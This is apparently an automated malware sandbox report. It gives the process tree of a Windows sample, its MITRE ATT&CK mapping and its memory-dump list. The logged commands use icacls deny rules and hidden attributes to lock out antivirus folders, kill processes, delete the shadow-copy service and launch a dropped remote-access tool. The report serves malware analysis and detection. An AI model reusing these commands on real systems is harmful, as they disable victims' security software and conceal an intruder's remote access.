      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:5640
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\360safe" /deny Администраторы:(OI)(CI)(F)
        5⤵
        
        PID:2276
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:4488
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\SpyHunter" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:2176
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:6032
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\Malwarebytes" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5148
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:5732
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\COMODO" /deny Администраторы:(OI)(CI)(F)
        5⤵
        
        PID:4412
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:5372
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\Enigma Software Group" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5188
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:6012
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\SpyHunter" /deny Администраторы:(OI)(CI)(F)
        5⤵
        
        PID:4764
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:4384
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\AVAST Software" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4336
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:5124
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\AVAST Software" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5796
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:4432
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Programdata\AVAST Software" /deny Администраторы:(OI)(CI)(F)
        5⤵
        
        PID:4972
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:3584
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\AVG" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:1560
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:4956
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\AVG" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5520
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:4436
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\Norton" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5736
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:5776
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Programdata\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5588
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
      4⤵
      PID:5392
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
        5⤵
        
        PID:5828
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:5536
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:6064
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
      4⤵
      PID:5444
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:6024
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:4500
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5576
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
      4⤵
      PID:5452
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
        5⤵
        
        PID:4392
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:6132
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
        5⤵
        
        PID:4292
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
      4⤵
      PID:5540
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
        5⤵
        
        PID:4712
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:4408
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\Doctor Web" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:1704
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:4964
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\grizzly" /deny Администраторы:(OI)(CI)(F)
        5⤵
        
        PID:2668
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:816
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\Cezurity" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5260
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:5516
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\Cezurity" /deny Администраторы:(OI)(CI)(F)
        5⤵
        
        PID:3152
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:5292
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\McAfee" /deny Администраторы:(OI)(CI)(F)
        5⤵
        
        PID:1456
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:4880
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\Avira" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5720
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:5300
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Администраторы:(OI)(CI)(F)
        5⤵
        
        PID:4696
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:6000
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\ESET" /deny Администраторы:(OI)(CI)(F)
        5⤵
        
        PID:5772
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
      4⤵
      PID:4936
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
        5⤵
        
        PID:5416
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:4372
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\ESET" /deny Администраторы:(OI)(CI)(F)
        5⤵
        
        PID:5844
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
      4⤵
      PID:5436
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:744
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:4228
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\Panda Security" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5572
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat
      4⤵
      Drops file in Drivers directory
      PID:5900
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat
      4⤵
      PID:6044
    - - C:\Windows\SysWOW64\timeout.exe
        
        TIMEOUT /T 5 /NOBREAK
        5⤵
        Delays execution with timeout.exe
        
        PID:1120
    - - C:\Windows\SysWOW64\timeout.exe
        
        TIMEOUT /T 3 /NOBREAK
        5⤵
        Delays execution with timeout.exe
        
        PID:5248
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /IM 1.exe /T /F
        5⤵
        Kills process with taskkill
        
        PID:5240
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /IM P.exe /T /F
        5⤵
        Kills process with taskkill
        
        PID:5060
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows
        5⤵
        Views/modifies file attributes
        
        PID:5992
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Intel\BLOCK.bat
      4⤵
      PID:3156
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /IM iediagcmd.exe /T /F
        5⤵
        Kills process with taskkill
        
        PID:1504
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\windows\speechstracing" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5976
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\windows\speechstracing" /deny system:(OI)(CI)(F)
        5⤵
        
        PID:4916
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "c:\program files\Internet Explorer\bin" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:400
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "c:\program files\Internet Explorer\bin" /deny System:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4516
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S "C:\Program Files\360\Total Security"
        5⤵
        Drops file in Program Files directory
        Views/modifies file attributes
        
        PID:4164
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\360\Total Security" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
        5⤵
        
        PID:5468
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\ProgramData\360TotalSecurity
        5⤵
        Views/modifies file attributes
        
        PID:3540
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\ProgramData\360safe
        5⤵
        Views/modifies file attributes
        
        PID:4008
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\360TotalSecurity" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5628
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\360safe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4100
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\ProgramData\Avira
        5⤵
        Views/modifies file attributes
        
        PID:5972
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\Avira" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5152
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S "C:\ProgramData\Package Cache"
        5⤵
        Views/modifies file attributes
        
        PID:6068
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\Package Cache" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5932
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S "C:\Program Files\ESET"
        5⤵
        Drops file in Program Files directory
        Views/modifies file attributes
        
        PID:5440
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\ESET" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
        5⤵
        
        PID:2864
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\ProgramData\ESET
        5⤵
        Views/modifies file attributes
        
        PID:5644
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\ESET" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5472
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S "C:\Program Files\AVAST Software\Avast"
        5⤵
        Drops file in Program Files directory
        Views/modifies file attributes
        
        PID:5204
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\AVAST Software\Avast" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
        5⤵
        
        PID:1164
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S "C:\Programdata\AVAST Software"
        5⤵
        Views/modifies file attributes
        
        PID:5360
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Programdata\AVAST Software" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
        5⤵
        
        PID:6104
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S "C:\Programdata\Kaspersky Lab"
        5⤵
        Views/modifies file attributes
        
        PID:5448
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S "C:\Programdata\Kaspersky Lab Setup Files"
        5⤵
        Views/modifies file attributes
        
        PID:5648
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Programdata\Kaspersky Lab" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
        5⤵
        
        PID:6072
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
        5⤵
        
        PID:4612
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S "C:\AdwCleaner"
        5⤵
        Views/modifies file attributes
        
        PID:5368
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\AdwCleaner" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:1616
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S "C:\Program Files\Malwarebytes\Anti-Malware"
        5⤵
        Drops file in Program Files directory
        Views/modifies file attributes
        
        PID:4160
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\Malwarebytes\Anti-Malware" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5492
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S "c:\programdata\Malwarebytes"
        5⤵
        Views/modifies file attributes
        
        PID:1816
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "c:\programdata\Malwarebytes" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4112
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S "C:\Programdata\MB3Install"
        5⤵
        Views/modifies file attributes
        
        PID:6028
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Programdata\MB3Install" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
        5⤵
        
        PID:204
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S "C:\KVRT_Data"
        5⤵
        Views/modifies file attributes
        
        PID:2404
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\KVRT_Data" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
        5⤵
        
        PID:4996
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S "C:\ProgramData\Norton"
        5⤵
        Views/modifies file attributes
        
        PID:5164
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\Norton" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
        5⤵
        
        PID:4324
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S "C:\ProgramData\Avg"
        5⤵
        Views/modifies file attributes
        
        PID:3792
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\Avg" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5924
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S "C:\ProgramData\grizzly"
        5⤵
        Views/modifies file attributes
        
        PID:5548
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\grizzly" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5200
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S "C:\ProgramData\Doctor Web"
        5⤵
        Views/modifies file attributes
        
        PID:4276
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\Doctor Web" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5744
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S "C:\ProgramData\Indus"
        5⤵
        Views/modifies file attributes
        
        PID:5696
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\Indus" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
        5⤵
        
        PID:3220
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S "C:\WINDOWS\McMwt"
        5⤵
        Drops file in Windows directory
        Views/modifies file attributes
        
        PID:5284
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\WINDOWS\McMwt" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
        5⤵
        
        PID:4604
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\WINDOWS\McMwt" /deny System:(OI)(CI)(F)
        5⤵
        
        PID:5504
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\lsass2.exe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4464
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\lsass2.exe" /deny System:(OI)(CI)(F)
        5⤵
        
        PID:4444
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 1
        5⤵
        Delays execution with timeout.exe
        
        PID:5728
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\lsass.exe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4004
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\lsass.exe" /deny System:(OI)(CI)(F)
        5⤵
        
        PID:4216
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\windows\boy.exe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:2192
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\windows\boy.exe" /deny System:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5528
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S "C:\ProgramData\Microsoft\Intel"
        5⤵
        Views/modifies file attributes
        
        PID:4968
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S "C:\ProgramData\Microsoft\Check"
        5⤵
        Views/modifies file attributes
        
        PID:5304
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S "C:\ProgramData\Microsoft\Temp"
        5⤵
        Views/modifies file attributes
        
        PID:5784
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete swprv
  2⤵
  PID:2544
- - C:\Windows\SysWOW64\sc.exe
    sc delete swprv
    3⤵
    PID:812

C:\ProgramData\Windows\rutserv.exe
C:\ProgramData\Windows\rutserv.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:420
- C:\ProgramData\Windows\rfusclient.exe
  C:\ProgramData\Windows\rfusclient.exe /tray
  2⤵
  - Executes dropped EXE
  PID:760
- C:\ProgramData\Windows\rfusclient.exe
  C:\ProgramData\Windows\rfusclient.exe
  2⤵
  - Executes dropped EXE
  PID:2928
- - C:\ProgramData\Windows\rfusclient.exe
    C:\ProgramData\Windows\rfusclient.exe /tray
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: SetClipboardViewer
    PID:3464

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2080

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s TermService
1⤵
PID:4424

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
PID:5460

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

Account Manipulation

T1098

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Winlogon Helper DLL

T1004

Privilege Escalation

Bypass User Account Control

T1088

Defense Evasion

Bypass User Account Control

T1088

Disabling Security Tools

T1089

File and Directory Permissions Modification

T1222

Hidden Files and Directories

Impair Defenses

Modify Registry

Web Service

Credential Access

Account Manipulation

T1098

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2928-59-0x0000000002F10000-0x0000000002F11000-memory.dmp

Filesize
4KB

Download
memory/2928-60-0x0000000003710000-0x0000000003711000-memory.dmp

Filesize
4KB

Download
memory/3860-36-0x0000000002FC0000-0x0000000002FC1000-memory.dmp

Filesize
4KB

Download
memory/3860-34-0x0000000002FC0000-0x0000000002FC1000-memory.dmp

Filesize
4KB

Download
memory/3860-35-0x00000000037C0000-0x00000000037C1000-memory.dmp

Filesize
4KB

Download